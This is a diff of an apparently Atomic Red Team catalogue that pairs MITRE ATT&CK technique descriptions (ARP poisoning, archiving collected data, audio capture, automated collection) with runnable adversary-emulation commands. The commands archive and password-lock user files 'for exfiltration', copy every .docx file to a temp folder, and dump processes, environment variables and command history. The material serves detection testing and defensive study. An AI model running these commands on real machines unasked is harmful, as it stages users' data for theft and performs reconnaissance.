Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. @@ -21277,6 +22191,9 @@ credential-access: - source_name: mitre-attack external_id: T1558 url: https://attack.mitre.org/techniques/T1558 + - external_id: CAPEC-652 + source_name: capec + url: https://capec.mitre.org/data/definitions/652.html - source_name: ADSecurity Kerberos Ring Decoder url: https://adsecurity.org/?p=227 description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s @@ -21330,7 +22247,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-31T12:59:11.121Z' + modified: '2020-09-29T16:16:06.868Z' created: '2020-02-11T19:12:46.830Z' x_mitre_system_requirements: - Kerberos authentication enabled @@ -21356,7 +22273,7 @@ credential-access: access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored." - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -21461,7 +22378,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-06-17T14:25:38.461Z' + modified: '2020-10-15T19:39:36.109Z' created: '2020-02-04T12:47:23.631Z' x_mitre_platforms: - Linux @@ -21478,7 +22395,7 @@ credential-access: - Administrator - SYSTEM x_mitre_is_subtechnique: false - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. @@ -21488,6 +22405,10 @@ credential-access: Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. x_mitre_data_sources: + - Azure activity logs + - Authentication logs + - AWS CloudTrail logs + - Windows event logs - File monitoring - Windows Registry - Process monitoring @@ -21495,23 +22416,6 @@ credential-access: atomic_tests: [] T1056.003: technique: - created: '2020-02-11T18:59:50.058Z' - modified: '2020-03-24T21:16:16.580Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern - id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e - description: |- - Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. - - This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging) - name: Web Portal Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1056.003 @@ -21523,19 +22427,2728 @@ credential-access: description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' source_name: Volexity Virtual Private Keylogging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Portal Capture + description: |- + Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. + + This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging) + id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-03-24T21:16:16.580Z' + created: '2020-02-11T18:59:50.058Z' + x_mitre_system_requirements: + - An externally facing login portal is configured. + x_mitre_data_sources: + - File monitoring + x_mitre_detection: File monitoring may be used to detect changes to files in + the Web directory for organization login pages that do not match with authorized + updates to the Web server's content. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - macOS - Windows + atomic_tests: [] +collection: + T1557.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1557.002 + url: https://attack.mitre.org/techniques/T1557/002 + - source_name: RFC826 ARP + url: https://tools.ietf.org/html/rfc826 + description: Plummer, D. (1982, November). An Ethernet Address Resolution + Protocol. Retrieved October 15, 2020. + - source_name: Sans ARP Spoofing Aug 2003 + url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 + description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved + October 15, 2020. + - source_name: Cylance Cleaver + description: Cylance. (2014, December). Operation Cleaver. Retrieved September + 14, 2017. + url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: ARP Cache Poisoning + description: | + Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). + + The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache. + + An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. + + The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) + + Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) + id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-16T15:22:11.604Z' + created: '2020-10-15T12:05:58.755Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous + ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches + across endpoints for signs of ARP poisoning. For example, if multiple IP addresses + map to a single MAC address, this could be an indicator that the ARP cache + has been poisoned." + x_mitre_data_sources: + - Packet capture + - Netflow/Enclave netflow + x_mitre_contributors: + - Jon Sternstein, Stern Security + x_mitre_platforms: + - Linux + - Windows + - macOS + atomic_tests: [] + T1560: + technique: + id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a + description: |- + An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. + + Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method. + name: Archive Collected Data + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1560 + url: https://attack.mitre.org/techniques/T1560 + - url: https://en.wikipedia.org/wiki/List_of_file_signatures + description: Wikipedia. (2016, March 31). List of file signatures. Retrieved + April 22, 2016. + source_name: Wikipedia File Header Signatures + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-21T16:36:55.831Z' + created: '2020-02-20T20:53:45.725Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters + - File monitoring + - Binary file metadata + x_mitre_detection: |- + Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. + + A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. + + Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + identifier: T1560 + atomic_tests: + - name: Compress Data for Exfiltration With PowerShell + auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration.\nWhen the test completes you should find + the files from the $env:USERPROFILE directory compressed in a file called + T1560-data-ps.zip in the $env:USERPROFILE directory \n" + supported_platforms: + - windows + input_arguments: + input_file: + description: Path that should be compressed into our output file + type: Path + default: "$env:USERPROFILE" + output_file: + description: Path where resulting compressed data should be placed + type: Path + default: "$env:USERPROFILE\\T1560-data-ps.zip" + executor: + name: powershell + elevation_required: false + command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} + +' + cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' + T1560.003: + technique: + created: '2020-02-20T21:09:55.995Z' + modified: '2020-03-25T22:48:14.605Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b + description: 'An adversary may compress or encrypt data that is collected prior + to exfiltration using a custom method. Adversaries may choose to use custom + archival methods, such as encryption with XOR or stream ciphers implemented + with no external library or utility references. Custom implementations of + well-known compression algorithms have also been used.(Citation: ESET Sednit + Part 2)' + name: Archive via Custom Method + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1560.003 + url: https://attack.mitre.org/techniques/T1560/003 + - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf + description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing + the Comings and Goings. Retrieved November 21, 2016.' + source_name: ESET Sednit Part 2 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_detection: Custom archival methods can be very difficult to detect, + since many of them use standard programming language concepts, such as bitwise + operations. x_mitre_is_subtechnique: true x_mitre_version: '1.0' + atomic_tests: [] + T1560.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1560.002 + url: https://attack.mitre.org/techniques/T1560/002 + - source_name: PyPI RAR + url: https://pypi.org/project/rarfile/ + description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020. + - source_name: libzip + url: https://libzip.org/ + description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, + 2020. + - source_name: Zlib Github + url: https://github.com/madler/zlib + description: madler. (2017). zlib. Retrieved February 20, 2020. + - url: https://en.wikipedia.org/wiki/List_of_file_signatures + description: Wikipedia. (2016, March 31). List of file signatures. Retrieved + April 22, 2016. + source_name: Wikipedia File Header Signatures + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Archive via Library + description: |- + An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data. + + Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism. + id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-29T18:27:30.891Z' + created: '2020-02-20T21:08:52.529Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used. + + Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1560.001: + technique: + created: '2020-02-20T21:01:25.428Z' + modified: '2020-03-25T21:54:37.374Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662 + description: |- + An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. + + Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. + name: Archive via Utility + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1560.001 + url: https://attack.mitre.org/techniques/T1560/001 + - source_name: 7zip Homepage + url: https://www.7-zip.org/ + description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. + - source_name: WinRAR Homepage + url: https://www.rarlab.com/ + description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. + - source_name: WinZip Homepage + url: https://www.winzip.com/win/en/ + description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. + - url: https://en.wikipedia.org/wiki/List_of_file_signatures + description: Wikipedia. (2016, March 31). List of file signatures. Retrieved + April 22, 2016. + source_name: Wikipedia File Header Signatures + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters + - File monitoring + - Binary file metadata + x_mitre_detection: |- + Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. + + Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1560.001 + atomic_tests: + - name: Compress Data for Exfiltration With Rar + auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration.\nWhen the test completes you should find + the txt files from the %USERPROFILE% directory compressed in a file called + T1560.001-data.rar in the %USERPROFILE% directory \n" + supported_platforms: + - windows + input_arguments: + input_path: + description: Path that should be compressed into our output file + type: Path + default: "%USERPROFILE%" + file_extension: + description: Extension of files to compress + type: String + default: ".txt" + output_file: + description: Path where resulting compressed data should be placed + type: Path + default: "%USERPROFILE%\\T1560.001-data.rar" + rar_installer: + description: Winrar installer + type: Path + default: "%TEMP%\\winrar.exe" + rar_exe: + description: The RAR executable from Winrar + type: Path + default: "%programfiles%/WinRAR/Rar.exe" + dependencies: + - description: 'Rar tool must be installed at specified location (#{rar_exe}) + +' + prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) + +' + get_prereq_command: | + echo Downloading Winrar installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} + echo Follow the installer prompts to install Winrar + #{rar_installer} + executor: + name: command_prompt + elevation_required: false + command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} + +' + cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 + +' + - name: Compress Data and lock with password for Exfiltration with winrar + auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c + description: | + Note: Requires winrar installation + rar a -p"blue" hello.rar (VARIANT) + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: | + mkdir .\tmp\victim-files + cd .\tmp\victim-files + echo "This file will be encrypted" > .\encrypted_file.txt + rar a -hp"blue" hello.rar + dir + - name: Compress Data and lock with password for Exfiltration with winzip + auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 + description: | + Note: Requires winzip installation + wzzip sample.zip -s"blueblue" *.txt (VARIANT) + supported_platforms: + - windows + input_arguments: + winzip_exe: + description: Path to installed Winzip executable + type: Path + default: "%ProgramFiles%\\WinZip\\winzip64.exe" + winzip_url: + description: Path to download Windows Credential Editor zip file + type: url + default: https://download.winzip.com/gl/nkln/winzip24-home.exe + winzip_hash: + description: File hash of the Windows Credential Editor zip file + type: String + default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB + dependency_executor_name: powershell + dependencies: + - description: 'Winzip must be installed + +' + prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo + 0)'' + +' + get_prereq_command: | + if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ + Write-Host Follow the installation prompts to continue + cmd /c "$env:Temp\winzip.exe" + } + executor: + name: command_prompt + elevation_required: false + command: | + path=%path%;"C:\Program Files (x86)\winzip" + mkdir .\tmp\victim-files + cd .\tmp\victim-files + echo "This file will be encrypted" > .\encrypted_file.txt + "#{winzip_exe}" -min -a -s"hello" archive.zip * + dir + - name: Compress Data and lock with password for Exfiltration with 7zip + auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 + description: 'Note: Requires 7zip installation + +' + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: | + mkdir $PathToAtomicsFolder\T1560.001\victim-files + cd $PathToAtomicsFolder\T1560.001\victim-files + echo "This file will be encrypted" > .\encrypted_file.txt + 7z a archive.7z -pblue + dir + - name: Data Compressed - nix - zip + auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + description: 'An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration. This test uses standard zip compression. + +' + supported_platforms: + - linux + - macos + input_arguments: + input_files: + description: Path that should be compressed into our output file, may include + wildcards + type: Path + default: "$HOME/*.txt" + output_file: + description: Path that should be output as a zip archive + type: Path + default: "$HOME/data.zip" + dependencies: + - description: 'Files to zip must exist (#{input_files}) + +' + prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else + exit 1; fi; + +' + get_prereq_command: 'echo Please set input_files argument to include files + that exist + +' + executor: + name: sh + elevation_required: false + command: 'zip #{output_file} #{input_files} + +' + cleanup_command: 'rm -f #{output_file} + +' + - name: Data Compressed - nix - gzip Single File + auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af + description: 'An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration. This test uses standard gzip compression. + +' + supported_platforms: + - linux + - macos + input_arguments: + input_file: + description: Path that should be compressed + type: Path + default: "$HOME/victim-gzip.txt" + input_content: + description: contents of compressed files if file does not already exist. + default contains test credit card and social security number + type: String + default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' + executor: + name: sh + elevation_required: false + command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' + >> #{input_file}; gzip -k #{input_file}) + +' + cleanup_command: 'rm -f #{input_file}.gz + +' + - name: Data Compressed - nix - tar Folder or File + auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a + description: 'An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration. This test uses standard gzip compression. + +' + supported_platforms: + - linux + - macos + input_arguments: + input_file_folder: + description: Path that should be compressed + type: Path + default: "$HOME/$USERNAME" + output_file: + description: File that should be output + type: Path + default: "$HOME/data.tar.gz" + dependencies: + - description: 'Folder to zip must exist (#{input_file_folder}) + +' + prereq_command: 'test -e #{input_file_folder} + +' + get_prereq_command: 'echo Please set input_file_folder argument to a folder + that exists + +' + executor: + name: sh + elevation_required: false + command: 'tar -cvzf #{output_file} #{input_file_folder} + +' + cleanup_command: 'rm -f #{output_file} + +' + - name: Data Encrypted with zip and gpg symmetric + auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' + description: 'Encrypt data for exiltration + +' + supported_platforms: + - macos + - linux + input_arguments: + test_folder: + description: Path used to store files. + type: Path + default: "/tmp/T1560" + test_file: + description: Temp file used to store encrypted data. + type: Path + default: T1560 + encryption_password: + description: Password used to encrypt data. + type: string + default: InsertPasswordHere + dependency_executor_name: sh + dependencies: + - description: gpg and zip are required to run the test. + prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" + ]; then exit 1; fi; + +' + get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1; + +' + executor: + name: sh + elevation_required: false + command: | + mkdir -p #{test_folder} + cd #{test_folder}; touch a b c d e f g + zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* + echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip + ls -l #{test_folder} + cleanup_command: 'rm -Rf #{test_folder}' + T1123: + technique: + id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Audio Capture + description: |- + An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. + + Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later. + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1123 + external_id: T1123 + - external_id: CAPEC-634 + source_name: capec + url: https://capec.mitre.org/data/definitions/634.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-07-14T19:42:10.235Z' + created: '2017-05-31T21:31:34.528Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. + + Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data. + x_mitre_data_sources: + - API monitoring + - Process monitoring + - File monitoring + x_mitre_version: '1.0' + identifier: T1123 + atomic_tests: + - name: using device audio capture commandlet + auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 + description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n" + supported_platforms: + - windows + executor: + command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet + +' + name: powershell + T1119: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1119 + external_id: T1119 + description: "Once established within a system or network, an adversary may + use automated techniques for collecting internal data. Methods for performing + this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) + to search for and copy information fitting set criteria such as file type, + location, or name at specific time intervals. This functionality could also + be built into remote access tools. \n\nThis technique may incorporate use + of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) + and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to + identify and move files." + name: Automated Collection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-31T22:18:43.019Z' + created: '2017-05-31T21:31:27.985Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_data_sources: + - File monitoring + - Data loss prevention + - Process command-line parameters + x_mitre_detection: Depending on the method used, actions could include common + file system commands and parameters on the command-line interface within batch + files or scripts. A sequence of actions like this may be unusual, depending + on the system and network environment. Automated collection may occur along + with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). + As such, file access monitoring that shows an unusual process performing sequential + file opens and potentially copy actions to another location on the file system + for many files at once may indicate automated collection behavior. Remote + access tools with built-in features may interact directly with the Windows + API to gather data. Data may also be acquired through Windows system management + tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_system_requirements: + - Permissions to access directories and files that store information of interest. + identifier: T1119 + atomic_tests: + - name: Automated Collection Command Prompt + auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b + description: | + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection + to see what was collected. + supported_platforms: + - windows + executor: + command: | + mkdir %temp%\T1119_command_prompt_collection >nul 2>&1 + dir c: /b /s .docx | findstr /e .docx + for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection + cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 + +' + name: command_prompt + - name: Automated Collection PowerShell + auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + description: | + Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection + to see what was collected. + supported_platforms: + - windows + executor: + command: | + New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null + Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection} + cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force + -ErrorAction Ignore | Out-Null + +' + name: powershell + - name: Recon information for export with PowerShell + auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 + description: | + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt + to see what was collected. + supported_platforms: + - windows + executor: + command: | + Get-Service > $env:TEMP\T1119_1.txt + Get-ChildItem Env: > $env:TEMP\T1119_2.txt + Get-Process > $env:TEMP\T1119_3.txt + cleanup_command: | + Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore + Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore + Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore + name: powershell + - name: Recon information for export with Command Prompt + auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + description: | + collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt + to see what was collected. + supported_platforms: + - windows + executor: + command: | + sc query type=service > %TEMP%\T1119_1.txt + doskey /history > %TEMP%\T1119_2.txt + wmic process list > %TEMP%\T1119_3.txt + tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt + cleanup_command: | + del %TEMP%\T1119_1.txt >nul 2>&1 + del %TEMP%\T1119_2.txt >nul 2>&1 + del %TEMP%\T1119_3.txt >nul 2>&1 + del %TEMP%\T1119_4.txt >nul 2>&1 + name: command_prompt + T1115: + technique: + id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Clipboard Data + description: "Adversaries may collect data stored in the clipboard from users + copying information within or between applications. \n\nIn Windows, Applications + can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) + OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: + Operating with EmPyre)" + external_references: + - source_name: mitre-attack + external_id: T1115 + url: https://attack.mitre.org/techniques/T1115 + - external_id: CAPEC-637 + source_name: capec + url: https://capec.mitre.org/data/definitions/637.html + - url: https://msdn.microsoft.com/en-us/library/ms649012 + description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016. + source_name: MSDN Clipboard + - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363 + description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July + 12, 2017. + source_name: Operating with EmPyre + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + 